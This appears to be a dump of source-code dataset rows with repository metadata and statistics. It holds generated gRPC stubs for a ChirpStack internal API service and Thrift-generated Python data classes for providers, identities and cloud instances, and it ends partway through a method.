"LogScalerPipeline",
"PcaPipeline",
"PcaSvdPipeline",
"KMeansPipeline",
"GaussBlurPipeline",
"HogTransformPipeline",
"TfidfPipeline",
"ToLowerUrlRemovePipeline",
"get_model",
"ModelType",
]
| 19.34375
| 40
| 0.686591
| 35
| 619
| 11.971429
| 0.542857
| 0.114558
| 0.21957
| 0.300716
| 0.840095
| 0.840095
| 0.840095
| 0.840095
| 0.840095
| 0.840095
| 0
| 0
| 0.219709
| 619
| 31
| 41
| 19.967742
| 0.867495
| 0
| 0
| 0
| 0
| 0
| 0.313409
| 0.074313
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.068966
| 0
| 0.068966
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9c2fbdec53ba6edc77b521670360c2c1b1546fbd
| 13,156
|
py
|
Python
|
python/src/chirpstack_api/as_pb/external/api/internal_pb2_grpc.py
|
geogerli/chirpstack-api
|
b51eb58055660565fbf186ddd8e6e6a8a7526331
|
[
"MIT"
] | null | null | null |
python/src/chirpstack_api/as_pb/external/api/internal_pb2_grpc.py
|
geogerli/chirpstack-api
|
b51eb58055660565fbf186ddd8e6e6a8a7526331
|
[
"MIT"
] | 1
|
2021-09-02T09:59:35.000Z
|
2021-09-02T09:59:35.000Z
|
python/src/chirpstack_api/as_pb/external/api/internal_pb2_grpc.py
|
iBrick/chirpstack-api
|
b160470d3707dfe317ac5a010124dc82813117fb
|
[
"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from chirpstack_api.as_pb.external.api import internal_pb2 as chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class InternalServiceStub(object):
"""InternalService is the service providing API endpoints for internal usage.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Login = channel.unary_unary(
'/api.InternalService/Login',
request_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.LoginRequest.SerializeToString,
response_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.LoginResponse.FromString,
)
self.Profile = channel.unary_unary(
'/api.InternalService/Profile',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ProfileResponse.FromString,
)
self.Branding = channel.unary_unary(
'/api.InternalService/Branding',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.BrandingResponse.FromString,
)
self.GlobalSearch = channel.unary_unary(
'/api.InternalService/GlobalSearch',
request_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.GlobalSearchRequest.SerializeToString,
response_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.GlobalSearchResponse.FromString,
)
self.CreateAPIKey = channel.unary_unary(
'/api.InternalService/CreateAPIKey',
request_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.CreateAPIKeyRequest.SerializeToString,
response_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.CreateAPIKeyResponse.FromString,
)
self.DeleteAPIKey = channel.unary_unary(
'/api.InternalService/DeleteAPIKey',
request_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.DeleteAPIKeyRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.ListAPIKeys = channel.unary_unary(
'/api.InternalService/ListAPIKeys',
request_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ListAPIKeysRequest.SerializeToString,
response_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ListAPIKeysResponse.FromString,
)
class InternalServiceServicer(object):
"""InternalService is the service providing API endpoints for internal usage.
"""
def Login(self, request, context):
"""Log in a user
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Profile(self, request, context):
"""Get the current user's profile
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Branding(self, request, context):
"""Get the branding for the UI
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GlobalSearch(self, request, context):
"""Perform a global search.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateAPIKey(self, request, context):
"""CreateAPIKey creates the given API key.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteAPIKey(self, request, context):
"""DeleteAPIKey deletes the API key.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListAPIKeys(self, request, context):
"""ListAPIKeys lists the available API keys.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_InternalServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Login': grpc.unary_unary_rpc_method_handler(
servicer.Login,
request_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.LoginRequest.FromString,
response_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.LoginResponse.SerializeToString,
),
'Profile': grpc.unary_unary_rpc_method_handler(
servicer.Profile,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ProfileResponse.SerializeToString,
),
'Branding': grpc.unary_unary_rpc_method_handler(
servicer.Branding,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.BrandingResponse.SerializeToString,
),
'GlobalSearch': grpc.unary_unary_rpc_method_handler(
servicer.GlobalSearch,
request_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.GlobalSearchRequest.FromString,
response_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.GlobalSearchResponse.SerializeToString,
),
'CreateAPIKey': grpc.unary_unary_rpc_method_handler(
servicer.CreateAPIKey,
request_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.CreateAPIKeyRequest.FromString,
response_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.CreateAPIKeyResponse.SerializeToString,
),
'DeleteAPIKey': grpc.unary_unary_rpc_method_handler(
servicer.DeleteAPIKey,
request_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.DeleteAPIKeyRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'ListAPIKeys': grpc.unary_unary_rpc_method_handler(
servicer.ListAPIKeys,
request_deserializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ListAPIKeysRequest.FromString,
response_serializer=chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ListAPIKeysResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'api.InternalService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class InternalService(object):
"""InternalService is the service providing API endpoints for internal usage.
"""
@staticmethod
def Login(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/api.InternalService/Login',
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.LoginRequest.SerializeToString,
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.LoginResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Profile(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/api.InternalService/Profile',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ProfileResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Branding(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/api.InternalService/Branding',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.BrandingResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GlobalSearch(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/api.InternalService/GlobalSearch',
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.GlobalSearchRequest.SerializeToString,
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.GlobalSearchResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateAPIKey(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/api.InternalService/CreateAPIKey',
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.CreateAPIKeyRequest.SerializeToString,
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.CreateAPIKeyResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteAPIKey(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/api.InternalService/DeleteAPIKey',
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.DeleteAPIKeyRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListAPIKeys(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/api.InternalService/ListAPIKeys',
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ListAPIKeysRequest.SerializeToString,
chirpstack__api_dot_as__pb_dot_external_dot_api_dot_internal__pb2.ListAPIKeysResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
| 49.089552
| 145
| 0.699301
| 1,336
| 13,156
| 6.363024
| 0.089072
| 0.047994
| 0.063992
| 0.071992
| 0.838725
| 0.804258
| 0.800965
| 0.769674
| 0.765792
| 0.752264
| 0
| 0.004584
| 0.237154
| 13,156
| 267
| 146
| 49.273408
| 0.842467
| 0.051459
| 0
| 0.513889
| 1
| 0
| 0.067436
| 0.034524
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.013889
| 0.032407
| 0.134259
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c661484f448dd02b43afab7e338f4875f03fa76
| 158
|
py
|
Python
|
src/monitoring/adapters/mock/__init__.py
|
gkovacs81/argus_server
|
97ebf705ed3e61a69bd561faf495e2c19bda510d
|
[
"MIT"
] | null | null | null |
src/monitoring/adapters/mock/__init__.py
|
gkovacs81/argus_server
|
97ebf705ed3e61a69bd561faf495e2c19bda510d
|
[
"MIT"
] | 3
|
2021-06-02T04:07:35.000Z
|
2021-12-27T20:21:46.000Z
|
src/monitoring/adapters/mock/__init__.py
|
gkovacs81/argus_server
|
97ebf705ed3e61a69bd561faf495e2c19bda510d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# @Author: Gábor Kovács
# @Date: 2021-02-25 20:10:01
# @Last Modified by: Gábor Kovács
# @Last Modified time: 2021-02-25 20:10:02
| 26.333333
| 42
| 0.632911
| 27
| 158
| 3.703704
| 0.62963
| 0.22
| 0.16
| 0.2
| 0.24
| 0
| 0
| 0
| 0
| 0
| 0
| 0.224806
| 0.183544
| 158
| 5
| 43
| 31.6
| 0.550388
| 0.93038
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c7663f94347294febddacdb369471056e7bd4ea
| 27,135
|
py
|
Python
|
skywalker/ttypes.py
|
iPlantCollaborativeOpenSource/skywalker-python
|
6ef2f98541d054a8c62df5b36eb307c0954f7805
|
[
"BSD-3-Clause"
] | null | null | null |
skywalker/ttypes.py
|
iPlantCollaborativeOpenSource/skywalker-python
|
6ef2f98541d054a8c62df5b36eb307c0954f7805
|
[
"BSD-3-Clause"
] | null | null | null |
skywalker/ttypes.py
|
iPlantCollaborativeOpenSource/skywalker-python
|
6ef2f98541d054a8c62df5b36eb307c0954f7805
|
[
"BSD-3-Clause"
] | null | null | null |
#
# Autogenerated by Thrift Compiler (0.9.2)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py:new_style,utf8strings
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Provider(object):
"""
Attributes:
- uuid
- name
- hash
- options
- time
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'uuid', None, None, ), # 1
(2, TType.STRING, 'name', None, None, ), # 2
(3, TType.STRING, 'hash', None, None, ), # 3
(4, TType.MAP, 'options', (TType.STRING,None,TType.STRING,None), None, ), # 4
(5, TType.I32, 'time', None, None, ), # 5
)
def __init__(self, uuid=None, name=None, hash=None, options=None, time=None,):
self.uuid = uuid
self.name = name
self.hash = hash
self.options = options
self.time = time
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.uuid = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.name = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.hash = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.MAP:
self.options = {}
(_ktype1, _vtype2, _size0 ) = iprot.readMapBegin()
for _i4 in xrange(_size0):
_key5 = iprot.readString().decode('utf-8')
_val6 = iprot.readString().decode('utf-8')
self.options[_key5] = _val6
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.time = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Provider')
if self.uuid is not None:
oprot.writeFieldBegin('uuid', TType.STRING, 1)
oprot.writeString(self.uuid.encode('utf-8'))
oprot.writeFieldEnd()
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 2)
oprot.writeString(self.name.encode('utf-8'))
oprot.writeFieldEnd()
if self.hash is not None:
oprot.writeFieldBegin('hash', TType.STRING, 3)
oprot.writeString(self.hash.encode('utf-8'))
oprot.writeFieldEnd()
if self.options is not None:
oprot.writeFieldBegin('options', TType.MAP, 4)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.options))
for kiter7,viter8 in self.options.items():
oprot.writeString(kiter7.encode('utf-8'))
oprot.writeString(viter8.encode('utf-8'))
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.time is not None:
oprot.writeFieldBegin('time', TType.I32, 5)
oprot.writeI32(self.time)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.uuid is None:
raise TProtocol.TProtocolException(message='Required field uuid is unset!')
if self.options is None:
raise TProtocol.TProtocolException(message='Required field options is unset!')
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.uuid)
value = (value * 31) ^ hash(self.name)
value = (value * 31) ^ hash(self.hash)
value = (value * 31) ^ hash(self.options)
value = (value * 31) ^ hash(self.time)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Identity(object):
"""
Attributes:
- uuid
- name
- hash
- options
- time
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'uuid', None, None, ), # 1
(2, TType.STRING, 'name', None, None, ), # 2
(3, TType.STRING, 'hash', None, None, ), # 3
(4, TType.MAP, 'options', (TType.STRING,None,TType.STRING,None), None, ), # 4
(5, TType.I32, 'time', None, None, ), # 5
)
def __init__(self, uuid=None, name=None, hash=None, options=None, time=None,):
self.uuid = uuid
self.name = name
self.hash = hash
self.options = options
self.time = time
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.uuid = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.name = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.hash = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.MAP:
self.options = {}
(_ktype10, _vtype11, _size9 ) = iprot.readMapBegin()
for _i13 in xrange(_size9):
_key14 = iprot.readString().decode('utf-8')
_val15 = iprot.readString().decode('utf-8')
self.options[_key14] = _val15
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.time = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Identity')
if self.uuid is not None:
oprot.writeFieldBegin('uuid', TType.STRING, 1)
oprot.writeString(self.uuid.encode('utf-8'))
oprot.writeFieldEnd()
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 2)
oprot.writeString(self.name.encode('utf-8'))
oprot.writeFieldEnd()
if self.hash is not None:
oprot.writeFieldBegin('hash', TType.STRING, 3)
oprot.writeString(self.hash.encode('utf-8'))
oprot.writeFieldEnd()
if self.options is not None:
oprot.writeFieldBegin('options', TType.MAP, 4)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.options))
for kiter16,viter17 in self.options.items():
oprot.writeString(kiter16.encode('utf-8'))
oprot.writeString(viter17.encode('utf-8'))
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.time is not None:
oprot.writeFieldBegin('time', TType.I32, 5)
oprot.writeI32(self.time)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.uuid is None:
raise TProtocol.TProtocolException(message='Required field uuid is unset!')
if self.options is None:
raise TProtocol.TProtocolException(message='Required field options is unset!')
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.uuid)
value = (value * 31) ^ hash(self.name)
value = (value * 31) ^ hash(self.hash)
value = (value * 31) ^ hash(self.options)
value = (value * 31) ^ hash(self.time)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Instance(object):
"""
Attributes:
- uuid
- machine_uuid
- name
- public_addresses
- private_addresses
- extra
- project_id
- provider_hash
- identity_hash
- time
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'uuid', None, None, ), # 1
(2, TType.STRING, 'machine_uuid', None, None, ), # 2
(3, TType.STRING, 'name', None, None, ), # 3
(4, TType.LIST, 'public_addresses', (TType.STRING,None), None, ), # 4
(5, TType.LIST, 'private_addresses', (TType.STRING,None), None, ), # 5
(6, TType.STRING, 'extra', None, None, ), # 6
(7, TType.STRING, 'project_id', None, None, ), # 7
(8, TType.STRING, 'provider_hash', None, None, ), # 8
(9, TType.STRING, 'identity_hash', None, None, ), # 9
(10, TType.I32, 'time', None, None, ), # 10
)
def __init__(self, uuid=None, machine_uuid=None, name=None, public_addresses=None, private_addresses=None, extra=None, project_id=None, provider_hash=None, identity_hash=None, time=None,):
self.uuid = uuid
self.machine_uuid = machine_uuid
self.name = name
self.public_addresses = public_addresses
self.private_addresses = private_addresses
self.extra = extra
self.project_id = project_id
self.provider_hash = provider_hash
self.identity_hash = identity_hash
self.time = time
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.uuid = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.machine_uuid = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.name = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.LIST:
self.public_addresses = []
(_etype21, _size18) = iprot.readListBegin()
for _i22 in xrange(_size18):
_elem23 = iprot.readString().decode('utf-8')
self.public_addresses.append(_elem23)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.LIST:
self.private_addresses = []
(_etype27, _size24) = iprot.readListBegin()
for _i28 in xrange(_size24):
_elem29 = iprot.readString().decode('utf-8')
self.private_addresses.append(_elem29)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRING:
self.extra = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.STRING:
self.project_id = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.STRING:
self.provider_hash = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.STRING:
self.identity_hash = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I32:
self.time = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Instance')
if self.uuid is not None:
oprot.writeFieldBegin('uuid', TType.STRING, 1)
oprot.writeString(self.uuid.encode('utf-8'))
oprot.writeFieldEnd()
if self.machine_uuid is not None:
oprot.writeFieldBegin('machine_uuid', TType.STRING, 2)
oprot.writeString(self.machine_uuid.encode('utf-8'))
oprot.writeFieldEnd()
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 3)
oprot.writeString(self.name.encode('utf-8'))
oprot.writeFieldEnd()
if self.public_addresses is not None:
oprot.writeFieldBegin('public_addresses', TType.LIST, 4)
oprot.writeListBegin(TType.STRING, len(self.public_addresses))
for iter30 in self.public_addresses:
oprot.writeString(iter30.encode('utf-8'))
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.private_addresses is not None:
oprot.writeFieldBegin('private_addresses', TType.LIST, 5)
oprot.writeListBegin(TType.STRING, len(self.private_addresses))
for iter31 in self.private_addresses:
oprot.writeString(iter31.encode('utf-8'))
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.extra is not None:
oprot.writeFieldBegin('extra', TType.STRING, 6)
oprot.writeString(self.extra.encode('utf-8'))
oprot.writeFieldEnd()
if self.project_id is not None:
oprot.writeFieldBegin('project_id', TType.STRING, 7)
oprot.writeString(self.project_id.encode('utf-8'))
oprot.writeFieldEnd()
if self.provider_hash is not None:
oprot.writeFieldBegin('provider_hash', TType.STRING, 8)
oprot.writeString(self.provider_hash.encode('utf-8'))
oprot.writeFieldEnd()
if self.identity_hash is not None:
oprot.writeFieldBegin('identity_hash', TType.STRING, 9)
oprot.writeString(self.identity_hash.encode('utf-8'))
oprot.writeFieldEnd()
if self.time is not None:
oprot.writeFieldBegin('time', TType.I32, 10)
oprot.writeI32(self.time)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.uuid is None:
raise TProtocol.TProtocolException(message='Required field uuid is unset!')
if self.machine_uuid is None:
raise TProtocol.TProtocolException(message='Required field machine_uuid is unset!')
if self.provider_hash is None:
raise TProtocol.TProtocolException(message='Required field provider_hash is unset!')
if self.time is None:
raise TProtocol.TProtocolException(message='Required field time is unset!')
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.uuid)
value = (value * 31) ^ hash(self.machine_uuid)
value = (value * 31) ^ hash(self.name)
value = (value * 31) ^ hash(self.public_addresses)
value = (value * 31) ^ hash(self.private_addresses)
value = (value * 31) ^ hash(self.extra)
value = (value * 31) ^ hash(self.project_id)
value = (value * 31) ^ hash(self.provider_hash)
value = (value * 31) ^ hash(self.identity_hash)
value = (value * 31) ^ hash(self.time)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Instances(object):
"""
Attributes:
- instances
- provider_hash
- identity_hash
- time
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'instances', (TType.STRUCT,(Instance, Instance.thrift_spec)), None, ), # 1
(2, TType.STRING, 'provider_hash', None, None, ), # 2
(3, TType.STRING, 'identity_hash', None, None, ), # 3
(4, TType.I32, 'time', None, None, ), # 4
)
def __init__(self, instances=None, provider_hash=None, identity_hash=None, time=None,):
self.instances = instances
self.provider_hash = provider_hash
self.identity_hash = identity_hash
self.time = time
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.instances = []
(_etype35, _size32) = iprot.readListBegin()
for _i36 in xrange(_size32):
_elem37 = Instance()
_elem37.read(iprot)
self.instances.append(_elem37)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.provider_hash = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.identity_hash = iprot.readString().decode('utf-8')
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I32:
self.time = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
